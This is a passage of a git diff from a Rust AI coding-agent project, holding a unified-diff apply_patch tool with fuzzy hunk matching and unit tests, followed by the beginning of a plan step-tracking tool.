||||
pub mod spec;
|
||||
pub mod subagent;
|
||||
pub mod todo;
|
||||
pub mod web_search;
|
||||
|
||||
// === Re-exports ===
|
||||
|
||||
// Re-export commonly used types from spec
|
||||
pub use spec::ToolContext;
|
||||
|
||||
// Re-export registry types
|
||||
pub use registry::{ToolRegistry, ToolRegistryBuilder};
|
||||
|
||||
// Re-export search tools
|
||||
pub use search::GrepFilesTool;
|
||||
|
||||
// Re-export web search tools
|
||||
pub use web_search::WebSearchTool;
|
||||
|
||||
// Re-export patch tools
|
||||
pub use patch::ApplyPatchTool;
|
||||
|
||||
// Re-export file tools
|
||||
pub use file::{EditFileTool, ListDirTool, ReadFileTool, WriteFileTool};
|
||||
|
||||
// Re-export shell types
|
||||
pub use shell::ExecShellTool;
|
||||
|
||||
// Re-export subagent types
|
||||
pub use subagent::SubAgent;
|
||||
|
||||
// Re-export todo types
|
||||
pub use todo::TodoWriteTool;
|
||||
|
||||
// Re-export plan types
|
||||
pub use plan::UpdatePlanTool;
|
||||
|
||||
// Re-export RLM tools
|
||||
pub use rlm::{RlmExecTool, RlmLoadTool, RlmQueryTool, RlmStatusTool};
|
||||
@@ -0,0 +1,662 @@
|
||||
//! Patch tools: `apply_patch` for unified diff patching
|
||||
//!
|
||||
//! This tool provides precise file modifications using unified diff format,
|
||||
//! supporting multi-hunk patches and fuzzy matching.
|
||||
|
||||
use std::fs;
|
||||
|
||||
use async_trait::async_trait;
|
||||
use serde::{Deserialize, Serialize};
|
||||
use serde_json::{Value, json};
|
||||
use thiserror::Error;
|
||||
|
||||
use super::spec::{
|
||||
ApprovalRequirement, ToolCapability, ToolContext, ToolError, ToolResult, ToolSpec,
|
||||
optional_bool, optional_u64, required_str,
|
||||
};
|
||||
|
||||
/// Maximum lines of context for fuzzy matching (increased for better tolerance)
|
||||
const MAX_FUZZ: usize = 50;
|
||||
|
||||
// === Types ===
|
||||
|
||||
/// Result of applying a patch
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
pub struct PatchResult {
|
||||
pub success: bool,
|
||||
pub hunks_applied: usize,
|
||||
pub hunks_total: usize,
|
||||
pub fuzz_used: usize,
|
||||
pub message: String,
|
||||
}
|
||||
|
||||
/// A single hunk in a unified diff
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct Hunk {
|
||||
pub old_start: usize,
|
||||
pub old_count: usize,
|
||||
pub new_start: usize,
|
||||
pub new_count: usize,
|
||||
pub lines: Vec<HunkLine>,
|
||||
}
|
||||
|
||||
/// A line in a hunk
|
||||
#[derive(Debug, Clone)]
|
||||
pub enum HunkLine {
|
||||
Context(String),
|
||||
Add(String),
|
||||
Remove(String),
|
||||
}
|
||||
|
||||
/// Tool for applying unified diff patches to files
|
||||
pub struct ApplyPatchTool;
|
||||
|
||||
// === Errors ===
|
||||
|
||||
#[derive(Debug, Error)]
|
||||
enum ApplyHunkError {
|
||||
#[error(
|
||||
"Failed to find matching location for hunk (expected at line {expected_line}, adjusted to {adjusted_line} with offset {offset:+})"
|
||||
)]
|
||||
NoMatch {
|
||||
expected_line: usize,
|
||||
adjusted_line: usize,
|
||||
offset: isize,
|
||||
},
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl ToolSpec for ApplyPatchTool {
|
||||
fn name(&self) -> &'static str {
|
||||
"apply_patch"
|
||||
}
|
||||
|
||||
fn description(&self) -> &'static str {
|
||||
"Apply a unified diff patch to a file. Supports multi-hunk patches with fuzzy matching."
|
||||
}
|
||||
|
||||
fn input_schema(&self) -> Value {
|
||||
json!({
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"path": {
|
||||
"type": "string",
|
||||
"description": "Path to the file to patch (relative to workspace)"
|
||||
},
|
||||
"patch": {
|
||||
"type": "string",
|
||||
"description": "Unified diff patch content"
|
||||
},
|
||||
"fuzz": {
|
||||
"type": "integer",
|
||||
"description": "Maximum fuzz factor for fuzzy matching (default: 3)"
|
||||
},
|
||||
"create_if_missing": {
|
||||
"type": "boolean",
|
||||
"description": "Create the file if it doesn't exist (for new file patches)"
|
||||
}
|
||||
},
|
||||
"required": ["path", "patch"]
|
||||
})
|
||||
}
|
||||
|
||||
fn capabilities(&self) -> Vec<ToolCapability> {
|
||||
vec![
|
||||
ToolCapability::WritesFiles,
|
||||
ToolCapability::Sandboxable,
|
||||
ToolCapability::RequiresApproval,
|
||||
]
|
||||
}
|
||||
|
||||
fn approval_requirement(&self) -> ApprovalRequirement {
|
||||
ApprovalRequirement::Suggest
|
||||
}
|
||||
|
||||
async fn execute(&self, input: Value, context: &ToolContext) -> Result<ToolResult, ToolError> {
|
||||
let path_str = required_str(&input, "path")?;
|
||||
let patch_text = required_str(&input, "patch")?;
|
||||
let fuzz = optional_u64(&input, "fuzz", MAX_FUZZ as u64).min(MAX_FUZZ as u64);
|
||||
let fuzz = usize::try_from(fuzz).unwrap_or(MAX_FUZZ);
|
||||
let create_if_missing = optional_bool(&input, "create_if_missing", false);
|
||||
|
||||
let file_path = context.resolve_path(path_str)?;
|
||||
|
||||
// Read existing file content (or empty for new files)
|
||||
let original_content = if file_path.exists() {
|
||||
fs::read_to_string(&file_path).map_err(|e| {
|
||||
ToolError::execution_failed(format!(
|
||||
"Failed to read {}: {}",
|
||||
file_path.display(),
|
||||
e
|
||||
))
|
||||
})?
|
||||
} else if create_if_missing {
|
||||
String::new()
|
||||
} else {
|
||||
return Err(ToolError::execution_failed(format!(
|
||||
"File {} does not exist. Set create_if_missing=true for new files.",
|
||||
file_path.display()
|
||||
)));
|
||||
};
|
||||
|
||||
// Parse the patch
|
||||
let hunks = parse_unified_diff(patch_text)?;
|
||||
if hunks.is_empty() {
|
||||
return Err(ToolError::invalid_input("No valid hunks found in patch"));
|
||||
}
|
||||
|
||||
// Apply hunks
|
||||
let mut lines: Vec<String> = original_content.lines().map(String::from).collect();
|
||||
let mut total_fuzz = 0;
|
||||
let mut hunks_applied = 0;
|
||||
let mut cumulative_offset: isize = 0; // Track line drift across hunks
|
||||
|
||||
for hunk in &hunks {
|
||||
match apply_hunk(&mut lines, hunk, fuzz, &mut cumulative_offset) {
|
||||
Ok(fuzz_used) => {
|
||||
total_fuzz += fuzz_used;
|
||||
hunks_applied += 1;
|
||||
}
|
||||
Err(e) => {
|
||||
return Err(ToolError::execution_failed(format!(
|
||||
"Failed to apply hunk at line {}: {}",
|
||||
hunk.old_start, e
|
||||
)));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Write the patched file
|
||||
let new_content = lines.join("\n");
|
||||
|
||||
// Create parent directories if needed
|
||||
if let Some(parent) = file_path.parent() {
|
||||
fs::create_dir_all(parent).map_err(|e| {
|
||||
ToolError::execution_failed(format!(
|
||||
"Failed to create directory {}: {}",
|
||||
parent.display(),
|
||||
e
|
||||
))
|
||||
})?;
|
||||
}
|
||||
|
||||
fs::write(&file_path, &new_content).map_err(|e| {
|
||||
ToolError::execution_failed(format!("Failed to write {}: {}", file_path.display(), e))
|
||||
})?;
|
||||
|
||||
let result = PatchResult {
|
||||
success: true,
|
||||
hunks_applied,
|
||||
hunks_total: hunks.len(),
|
||||
fuzz_used: total_fuzz,
|
||||
message: format!(
|
||||
"Applied {}/{} hunks to {} (fuzz: {})",
|
||||
hunks_applied,
|
||||
hunks.len(),
|
||||
file_path.display(),
|
||||
total_fuzz
|
||||
),
|
||||
};
|
||||
|
||||
ToolResult::json(&result).map_err(|e| ToolError::execution_failed(e.to_string()))
|
||||
}
|
||||
}
|
||||
|
||||
/// Parse a unified diff into hunks
|
||||
fn parse_unified_diff(patch: &str) -> Result<Vec<Hunk>, ToolError> {
|
||||
let mut hunks = Vec::new();
|
||||
let mut lines = patch.lines().peekable();
|
||||
|
||||
// Skip header lines (---, +++ etc)
|
||||
while let Some(line) = lines.peek() {
|
||||
if line.starts_with("@@") {
|
||||
break;
|
||||
}
|
||||
lines.next();
|
||||
}
|
||||
|
||||
// Parse hunks
|
||||
while let Some(line) = lines.next() {
|
||||
if line.starts_with("@@") {
|
||||
let hunk = parse_hunk_header(line, &mut lines)?;
|
||||
hunks.push(hunk);
|
||||
}
|
||||
}
|
||||
|
||||
Ok(hunks)
|
||||
}
|
||||
|
||||
/// Parse a hunk header and its content
|
||||
fn parse_hunk_header<'a, I>(
|
||||
header: &str,
|
||||
lines: &mut std::iter::Peekable<I>,
|
||||
) -> Result<Hunk, ToolError>
|
||||
where
|
||||
I: Iterator<Item = &'a str>,
|
||||
{
|
||||
// Parse @@ -old_start,old_count +new_start,new_count @@
|
||||
let parts: Vec<&str> = header.split_whitespace().collect();
|
||||
if parts.len() < 3 {
|
||||
return Err(ToolError::invalid_input(format!(
|
||||
"Invalid hunk header: {header}"
|
||||
)));
|
||||
}
|
||||
|
||||
let old_range = parts[1].trim_start_matches('-');
|
||||
let new_range = parts[2].trim_start_matches('+');
|
||||
|
||||
let (old_start, old_count) = parse_range(old_range)?;
|
||||
let (new_start, new_count) = parse_range(new_range)?;
|
||||
|
||||
// Parse hunk lines
|
||||
let mut hunk_lines = Vec::new();
|
||||
let expected_lines = old_count.max(new_count) + old_count.min(new_count);
|
||||
|
||||
for _ in 0..expected_lines * 2 {
|
||||
// Allow for more lines than expected
|
||||
match lines.peek() {
|
||||
Some(line) if line.starts_with("@@") => break,
|
||||
Some(line) if line.starts_with('-') => {
|
||||
hunk_lines.push(HunkLine::Remove(line[1..].to_string()));
|
||||
lines.next();
|
||||
}
|
||||
Some(line) if line.starts_with('+') => {
|
||||
hunk_lines.push(HunkLine::Add(line[1..].to_string()));
|
||||
lines.next();
|
||||
}
|
||||
Some(line) if line.starts_with(' ') || line.is_empty() => {
|
||||
let content = if line.is_empty() { "" } else { &line[1..] };
|
||||
hunk_lines.push(HunkLine::Context(content.to_string()));
|
||||
lines.next();
|
||||
}
|
||||
Some(line) if !line.starts_with('\\') => {
|
||||
// Treat as context line without leading space
|
||||
hunk_lines.push(HunkLine::Context((*line).to_string()));
|
||||
lines.next();
|
||||
}
|
||||
Some(_) => {
|
||||
lines.next(); // Skip "\ No newline at end of file" etc
|
||||
}
|
||||
None => break,
|
||||
}
|
||||
}
|
||||
|
||||
Ok(Hunk {
|
||||
old_start,
|
||||
old_count,
|
||||
new_start,
|
||||
new_count,
|
||||
lines: hunk_lines,
|
||||
})
|
||||
}
|
||||
|
||||
/// Parse a range like "10,5" or "10" into (start, count)
|
||||
fn parse_range(range: &str) -> Result<(usize, usize), ToolError> {
|
||||
let parts: Vec<&str> = range.split(',').collect();
|
||||
let start = parts[0]
|
||||
.parse::<usize>()
|
||||
.map_err(|_| ToolError::invalid_input(format!("Invalid line number: {}", parts[0])))?;
|
||||
let count = if parts.len() > 1 {
|
||||
parts[1]
|
||||
.parse::<usize>()
|
||||
.map_err(|_| ToolError::invalid_input(format!("Invalid count: {}", parts[1])))?
|
||||
} else {
|
||||
1
|
||||
};
|
||||
Ok((start, count))
|
||||
}
|
||||
|
||||
/// Apply a hunk to the file content with fuzzy matching
|
||||
fn apply_hunk(
|
||||
lines: &mut Vec<String>,
|
||||
hunk: &Hunk,
|
||||
max_fuzz: usize,
|
||||
cumulative_offset: &mut isize,
|
||||
) -> Result<usize, ApplyHunkError> {
|
||||
// Build expected old lines from hunk
|
||||
let old_lines: Vec<&str> = hunk
|
||||
.lines
|
||||
.iter()
|
||||
.filter_map(|line| match line {
|
||||
HunkLine::Context(s) | HunkLine::Remove(s) => Some(s.as_str()),
|
||||
HunkLine::Add(_) => None,
|
||||
})
|
||||
.collect();
|
||||
|
||||
// Build new lines from hunk
|
||||
let new_lines: Vec<String> = hunk
|
||||
.lines
|
||||
.iter()
|
||||
.filter_map(|line| match line {
|
||||
HunkLine::Context(s) | HunkLine::Add(s) => Some(s.clone()),
|
||||
HunkLine::Remove(_) => None,
|
||||
})
|
||||
.collect();
|
||||
|
||||
// Try to find the location with fuzzy matching
|
||||
// Apply cumulative offset from previous hunks
|
||||
let base_idx = if hunk.old_start > 0 {
|
||||
hunk.old_start - 1
|
||||
} else {
|
||||
0
|
||||
};
|
||||
let start_idx = ((base_idx as isize) + *cumulative_offset).max(0) as usize;
|
||||
|
||||
for fuzz in 0..=max_fuzz {
|
||||
// Try at exact position first, then nearby
|
||||
let search_range = if fuzz == 0 {
|
||||
vec![start_idx]
|
||||
} else {
|
||||
let min = start_idx.saturating_sub(fuzz);
|
||||
let max = (start_idx + fuzz).min(lines.len());
|
||||
(min..=max).collect()
|
||||
};
|
||||
|
||||
for pos in search_range {
|
||||
if matches_at_position(lines, &old_lines, pos) {
|
||||
// Apply the hunk
|
||||
let end_pos = pos + old_lines.len();
|
||||
lines.splice(pos..end_pos, new_lines.clone());
|
||||
|
||||
// Update cumulative offset: new lines added minus old lines removed
|
||||
let delta = new_lines.len() as isize - old_lines.len() as isize;
|
||||
*cumulative_offset += delta;
|
||||
|
||||
return Ok(fuzz);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Special case: adding to empty file or new hunk at end
|
||||
if old_lines.is_empty() && (lines.is_empty() || start_idx >= lines.len()) {
|
||||
let delta = new_lines.len() as isize;
|
||||
lines.extend(new_lines);
|
||||
*cumulative_offset += delta;
|
||||
return Ok(0);
|
||||
}
|
||||
|
||||
Err(ApplyHunkError::NoMatch {
|
||||
expected_line: hunk.old_start,
|
||||
adjusted_line: start_idx + 1, // Convert back to 1-indexed
|
||||
offset: *cumulative_offset,
|
||||
})
|
||||
}
|
||||
|
||||
/// Check if `old_lines` match at the given position
|
||||
fn matches_at_position(lines: &[String], old_lines: &[&str], pos: usize) -> bool {
|
||||
if pos + old_lines.len() > lines.len() {
|
||||
return false;
|
||||
}
|
||||
|
||||
for (i, old_line) in old_lines.iter().enumerate() {
|
||||
// Normalize whitespace for comparison
|
||||
let file_line = lines[pos + i].trim_end();
|
||||
let expected = old_line.trim_end();
|
||||
if file_line != expected {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
true
|
||||
}
|
||||
|
||||
// === Unit Tests ===
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use tempfile::tempdir;
|
||||
|
||||
#[test]
|
||||
fn test_parse_range() {
|
||||
assert_eq!(parse_range("10,5").unwrap(), (10, 5));
|
||||
assert_eq!(parse_range("10").unwrap(), (10, 1));
|
||||
assert_eq!(parse_range("1,0").unwrap(), (1, 0));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_parse_unified_diff() {
|
||||
let patch = r"--- a/test.txt
|
||||
+++ b/test.txt
|
||||
@@ -1,3 +1,3 @@
|
||||
line1
|
||||
-line2
|
||||
+modified line2
|
||||
line3
|
||||
";
|
||||
|
||||
let hunks = parse_unified_diff(patch).unwrap();
|
||||
assert_eq!(hunks.len(), 1);
|
||||
assert_eq!(hunks[0].old_start, 1);
|
||||
assert_eq!(hunks[0].old_count, 3);
|
||||
assert_eq!(hunks[0].new_start, 1);
|
||||
assert_eq!(hunks[0].new_count, 3);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_apply_hunk_simple() {
|
||||
let mut lines = vec![
|
||||
"line1".to_string(),
|
||||
"line2".to_string(),
|
||||
"line3".to_string(),
|
||||
];
|
||||
|
||||
let hunk = Hunk {
|
||||
old_start: 1,
|
||||
old_count: 3,
|
||||
new_start: 1,
|
||||
new_count: 3,
|
||||
lines: vec![
|
||||
HunkLine::Context("line1".to_string()),
|
||||
HunkLine::Remove("line2".to_string()),
|
||||
HunkLine::Add("modified".to_string()),
|
||||
HunkLine::Context("line3".to_string()),
|
||||
],
|
||||
};
|
||||
|
||||
let mut offset: isize = 0;
|
||||
let fuzz = apply_hunk(&mut lines, &hunk, 0, &mut offset).unwrap();
|
||||
assert_eq!(fuzz, 0);
|
||||
assert_eq!(lines, vec!["line1", "modified", "line3"]);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_apply_hunk_with_fuzz() {
|
||||
let mut lines = vec![
|
||||
"line0".to_string(),
|
||||
"line1".to_string(),
|
||||
"line2".to_string(),
|
||||
"line3".to_string(),
|
||||
];
|
||||
|
||||
// Hunk expects to start at line 1, but content is at line 2
|
||||
let hunk = Hunk {
|
||||
old_start: 1, // Wrong position
|
||||
old_count: 2,
|
||||
new_start: 1,
|
||||
new_count: 2,
|
||||
lines: vec![
|
||||
HunkLine::Remove("line1".to_string()),
|
||||
HunkLine::Add("modified".to_string()),
|
||||
HunkLine::Context("line2".to_string()),
|
||||
],
|
||||
};
|
||||
|
||||
let mut offset: isize = 0;
|
||||
let fuzz = apply_hunk(&mut lines, &hunk, 3, &mut offset).unwrap();
|
||||
assert!(fuzz > 0);
|
||||
assert_eq!(lines, vec!["line0", "modified", "line2", "line3"]);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_apply_hunk_no_match_returns_error() {
|
||||
let mut lines = vec!["line1".to_string(), "line2".to_string()];
|
||||
let hunk = Hunk {
|
||||
old_start: 5,
|
||||
old_count: 1,
|
||||
new_start: 5,
|
||||
new_count: 1,
|
||||
lines: vec![
|
||||
HunkLine::Context("missing".to_string()),
|
||||
HunkLine::Add("new".to_string()),
|
||||
],
|
||||
};
|
||||
|
||||
let mut offset: isize = 0;
|
||||
let err = apply_hunk(&mut lines, &hunk, 0, &mut offset).unwrap_err();
|
||||
assert!(matches!(
|
||||
err,
|
||||
ApplyHunkError::NoMatch {
|
||||
expected_line: 5,
|
||||
..
|
||||
}
|
||||
));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_apply_patch_tool() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
// Create a test file
|
||||
fs::write(tmp.path().join("test.txt"), "line1\nline2\nline3\n").expect("write");
|
||||
|
||||
let patch = r"--- a/test.txt
|
||||
+++ b/test.txt
|
||||
@@ -1,3 +1,3 @@
|
||||
line1
|
||||
-line2
|
||||
+modified
|
||||
line3
|
||||
";
|
||||
|
||||
let tool = ApplyPatchTool;
|
||||
let result = tool
|
||||
.execute(json!({"path": "test.txt", "patch": patch}), &ctx)
|
||||
.await
|
||||
.expect("execute");
|
||||
|
||||
assert!(result.success);
|
||||
|
||||
// Verify the patch was applied
|
||||
let content = fs::read_to_string(tmp.path().join("test.txt")).expect("read");
|
||||
assert!(content.contains("modified"));
|
||||
assert!(!content.contains("line2"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_apply_patch_add_lines() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
fs::write(tmp.path().join("test.txt"), "line1\nline3\n").expect("write");
|
||||
|
||||
let patch = r"@@ -1,2 +1,3 @@
|
||||
line1
|
||||
+line2
|
||||
line3
|
||||
";
|
||||
|
||||
let tool = ApplyPatchTool;
|
||||
let result = tool
|
||||
.execute(json!({"path": "test.txt", "patch": patch}), &ctx)
|
||||
.await
|
||||
.expect("execute");
|
||||
|
||||
assert!(result.success);
|
||||
|
||||
let content = fs::read_to_string(tmp.path().join("test.txt")).expect("read");
|
||||
assert!(content.contains("line2"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_apply_patch_create_new_file() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
let patch = r"@@ -0,0 +1,3 @@
|
||||
+line1
|
||||
+line2
|
||||
+line3
|
||||
";
|
||||
|
||||
let tool = ApplyPatchTool;
|
||||
let result = tool
|
||||
.execute(
|
||||
json!({"path": "new_file.txt", "patch": patch, "create_if_missing": true}),
|
||||
&ctx,
|
||||
)
|
||||
.await
|
||||
.expect("execute");
|
||||
|
||||
assert!(result.success);
|
||||
assert!(tmp.path().join("new_file.txt").exists());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_apply_patch_tool_properties() {
|
||||
let tool = ApplyPatchTool;
|
||||
assert_eq!(tool.name(), "apply_patch");
|
||||
assert!(!tool.is_read_only());
|
||||
assert!(tool.is_sandboxable());
|
||||
assert_eq!(tool.approval_requirement(), ApprovalRequirement::Suggest);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_multi_hunk_offset_tracking() {
|
||||
// File with 6 lines
|
||||
let mut lines: Vec<String> = vec![
|
||||
"line1".to_string(),
|
||||
"line2".to_string(),
|
||||
"line3".to_string(),
|
||||
"line4".to_string(),
|
||||
"line5".to_string(),
|
||||
"line6".to_string(),
|
||||
];
|
||||
|
||||
// Hunk 1: Add 2 lines after line1 (offset becomes +2)
|
||||
let hunk1 = Hunk {
|
||||
old_start: 1,
|
||||
old_count: 2,
|
||||
new_start: 1,
|
||||
new_count: 4,
|
||||
lines: vec![
|
||||
HunkLine::Context("line1".to_string()),
|
||||
HunkLine::Add("new_a".to_string()),
|
||||
HunkLine::Add("new_b".to_string()),
|
||||
HunkLine::Context("line2".to_string()),
|
||||
],
|
||||
};
|
||||
|
||||
// Hunk 2: Modify line5 (originally at position 5, now at position 7 due to +2 offset)
|
||||
let hunk2 = Hunk {
|
||||
old_start: 5, // Original position in the diff
|
||||
old_count: 1,
|
||||
new_start: 7,
|
||||
new_count: 1,
|
||||
lines: vec![
|
||||
HunkLine::Remove("line5".to_string()),
|
||||
HunkLine::Add("modified5".to_string()),
|
||||
],
|
||||
};
|
||||
|
||||
let mut offset: isize = 0;
|
||||
|
||||
// Apply first hunk
|
||||
let fuzz1 = apply_hunk(&mut lines, &hunk1, 3, &mut offset).unwrap();
|
||||
assert_eq!(fuzz1, 0);
|
||||
assert_eq!(offset, 2); // Added 2 lines (4 new - 2 old)
|
||||
assert_eq!(
|
||||
lines,
|
||||
vec![
|
||||
"line1", "new_a", "new_b", "line2", "line3", "line4", "line5", "line6"
|
||||
]
|
||||
);
|
||||
|
||||
// Apply second hunk - this would fail without offset tracking!
|
||||
let fuzz2 = apply_hunk(&mut lines, &hunk2, 3, &mut offset).unwrap();
|
||||
assert_eq!(fuzz2, 0);
|
||||
assert!(lines.contains(&"modified5".to_string()));
|
||||
assert!(!lines.contains(&"line5".to_string()));
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,408 @@
|
||||
//! Plan tool implementation with step tracking and validation
|
||||
|
||||
use std::sync::{Arc, Mutex};
|
||||
use std::time::{Duration, Instant};
|
||||
|
||||
use async_trait::async_trait;
|
||||
use serde::{Deserialize, Serialize};
|
||||
use serde_json::json;
|
||||
|
||||
use crate::tools::spec::{
|
||||
ApprovalRequirement, ToolCapability, ToolContext, ToolError, ToolResult, ToolSpec,
|
||||
};
|
||||
|
||||
// === Types ===
|
||||
|
||||
/// Status of a plan step.
|
||||
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
|
||||
#[serde(rename_all = "snake_case")]
|
||||
pub enum StepStatus {
|
||||
Pending,
|
||||
InProgress,
|
||||
Completed,
|
||||
}
|
||||
|
||||
impl StepStatus {
|
||||
#[allow(dead_code)]
|
||||
#[must_use]
|
||||
pub fn from_str(value: &str) -> Option<Self> {
|
||||
match value.trim().to_lowercase().as_str() {
|
||||
"pending" => Some(StepStatus::Pending),
|
||||
"in_progress" | "inprogress" => Some(StepStatus::InProgress),
|
||||
"completed" | "done" => Some(StepStatus::Completed),
|
||||
_ => None,
|
||||
}
|
||||
}
|
||||
|
||||
#[allow(dead_code)]
|
||||
#[must_use]
|
||||
pub fn symbol(&self) -> &'static str {
|
||||
match self {
|
||||
StepStatus::Pending => "○",
|
||||
StepStatus::InProgress => "◎",
|
||||
StepStatus::Completed => "●",
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Input representation for a plan item.
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
pub struct PlanItemArg {
|
||||
pub step: String,
|
||||
pub status: StepStatus,
|
||||
}
|
||||
|
||||
/// Update payload used by the plan tool.
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
pub struct UpdatePlanArgs {
|
||||
#[serde(default)]
|
||||
pub explanation: Option<String>,
|
||||
pub plan: Vec<PlanItemArg>,
|
||||
}
|
||||
|
||||
// === Plan State ===
|
||||
|
||||
/// A plan step with timing information
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct PlanStep {
|
||||
pub text: String,
|
||||
pub status: StepStatus,
|
||||
/// When the step was started (transitioned to `InProgress`)
|
||||
pub started_at: Option<Instant>,
|
||||
/// When the step was completed
|
||||
pub completed_at: Option<Instant>,
|
||||
}
|
||||
|
||||
impl PlanStep {
|
||||
/// Create a new plan step.
|
||||
pub fn new(text: String, status: StepStatus) -> Self {
|
||||
Self {
|
||||
text,
|
||||
status,
|
||||
started_at: None,
|
||||
completed_at: None,
|
||||
}
|
||||
}
|
||||
|
||||
/// Get the elapsed time if the step has timing info
|
||||
#[must_use]
|
||||
pub fn elapsed(&self) -> Option<Duration> {
|
||||
match (self.started_at, self.completed_at) {
|
||||
(Some(start), Some(end)) => Some(end.duration_since(start)),
|
||||
(Some(start), None) if self.status == StepStatus::InProgress => Some(start.elapsed()),
|
||||
_ => None,
|
||||
}
|
||||
}
|
||||
|
||||
/// Format elapsed time for display
|
||||
#[must_use]
|
||||
pub fn elapsed_str(&self) -> String {
|
||||
match self.elapsed() {
|
||||
Some(d) => {
|
||||
let secs = d.as_secs();
|
||||
if secs < 60 {
|
||||
format!("{secs}s")
|
||||
} else if secs < 3600 {
|
||||
format!("{}m {}s", secs / 60, secs % 60)
|
||||
} else {
|
||||
format!("{}h {}m", secs / 3600, (secs % 3600) / 60)
|
||||
}
|
||||
}
|
||||
None => String::new(),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Serializable snapshot for display
|
||||
#[derive(Debug, Clone, Serialize)]
|
||||
pub struct PlanSnapshot {
|
||||
pub explanation: Option<String>,
|
||||
pub items: Vec<PlanItemArg>,
|
||||
}
|
||||
|
||||
/// State tracking for the current plan
|
||||
#[derive(Debug, Clone, Default)]
|
||||
pub struct PlanState {
|
||||
explanation: Option<String>,
|
||||
steps: Vec<PlanStep>,
|
||||
}
|
||||
|
||||
impl PlanState {
|
||||
/// Check whether the plan is empty.
|
||||
#[must_use]
|
||||
pub fn is_empty(&self) -> bool {
|
||||
self.steps.is_empty() && self.explanation.as_deref().unwrap_or("").is_empty()
|
||||
}
|
||||
|
||||
pub fn update(&mut self, args: UpdatePlanArgs) {
|
||||
self.explanation = args.explanation.filter(|s| !s.trim().is_empty());
|
||||
|
||||
let now = Instant::now();
|
||||
let mut new_steps = Vec::new();
|
||||
let mut in_progress_seen = false;
|
||||
|
||||
for item in args.plan {
|
||||
// Try to find existing step to preserve timing
|
||||
let existing = self.steps.iter().find(|s| s.text == item.step);
|
||||
|
||||
let mut status = item.status;
|
||||
// Enforce single in_progress
|
||||
if status == StepStatus::InProgress {
|
||||
if in_progress_seen {
|
||||
status = StepStatus::Pending;
|
||||
} else {
|
||||
in_progress_seen = true;
|
||||
}
|
||||
}
|
||||
|
||||
let step = if let Some(old) = existing {
|
||||
let mut s = old.clone();
|
||||
let old_status = s.status.clone();
|
||||
s.status = status.clone();
|
||||
|
||||
// Track timing transitions
|
||||
if old_status == StepStatus::Pending && status == StepStatus::InProgress {
|
||||
s.started_at = Some(now);
|
||||
}
|
||||
if old_status == StepStatus::InProgress && status == StepStatus::Completed {
|
||||
s.completed_at = Some(now);
|
||||
}
|
||||
|
||||
s
|
||||
} else {
|
||||
let mut s = PlanStep::new(item.step, status.clone());
|
||||
if status == StepStatus::InProgress {
|
||||
s.started_at = Some(now);
|
||||
}
|
||||
s
|
||||
};
|
||||
|
||||
new_steps.push(step);
|
||||
}
|
||||
|
||||
self.steps = new_steps;
|
||||
}
|
||||
|
||||
pub fn snapshot(&self) -> PlanSnapshot {
|
||||
PlanSnapshot {
|
||||
explanation: self.explanation.clone(),
|
||||
items: self
|
||||
.steps
|
||||
.iter()
|
||||
.map(|s| PlanItemArg {
|
||||
step: s.text.clone(),
|
||||
status: s.status.clone(),
|
||||
})
|
||||
.collect(),
|
||||
}
|
||||
}
|
||||
|
||||
pub fn explanation(&self) -> Option<&str> {
|
||||
self.explanation.as_deref()
|
||||
}
|
||||
|
||||
pub fn steps(&self) -> &[PlanStep] {
|
||||
&self.steps
|
||||
}
|
||||
|
||||
/// Get counts of steps by status
|
||||
pub fn counts(&self) -> (usize, usize, usize) {
|
||||
let mut pending = 0;
|
||||
let mut in_progress = 0;
|
||||
let mut completed = 0;
|
||||
for s in &self.steps {
|
||||
match s.status {
|
||||
StepStatus::Pending => pending += 1,
|
||||
StepStatus::InProgress => in_progress += 1,
|
||||
StepStatus::Completed => completed += 1,
|
||||
}
|
||||
}
|
||||
(pending, in_progress, completed)
|
||||
}
|
||||
|
||||
/// Get progress as a percentage
|
||||
pub fn progress_percent(&self) -> u8 {
|
||||
if self.steps.is_empty() {
|
||||
return 0;
|
||||
}
|
||||
let completed = self
|
||||
.steps
|
||||
.iter()
|
||||
.filter(|s| s.status == StepStatus::Completed)
|
||||
.count();
|
||||
let percent = completed.saturating_mul(100) / self.steps.len();
|
||||
u8::try_from(percent).unwrap_or(u8::MAX)
|
||||
}
|
||||
}
|
||||
|
||||
/// Validation result for plan transitions
|
||||
#[derive(Debug)]
|
||||
#[allow(dead_code)]
|
||||
pub enum PlanValidation {
|
||||
Ok,
|
||||
Warning(String),
|
||||
Error(String),
|
||||
}
|
||||
|
||||
/// Validate a plan update
|
||||
#[allow(dead_code)]
|
||||
pub fn validate_plan_update(current: &PlanState, update: &UpdatePlanArgs) -> PlanValidation {
|
||||
let current_steps: std::collections::HashMap<_, _> = current
|
||||
.steps()
|
||||
.iter()
|
||||
.map(|s| (s.text.clone(), &s.status))
|
||||
.collect();
|
||||
|
||||
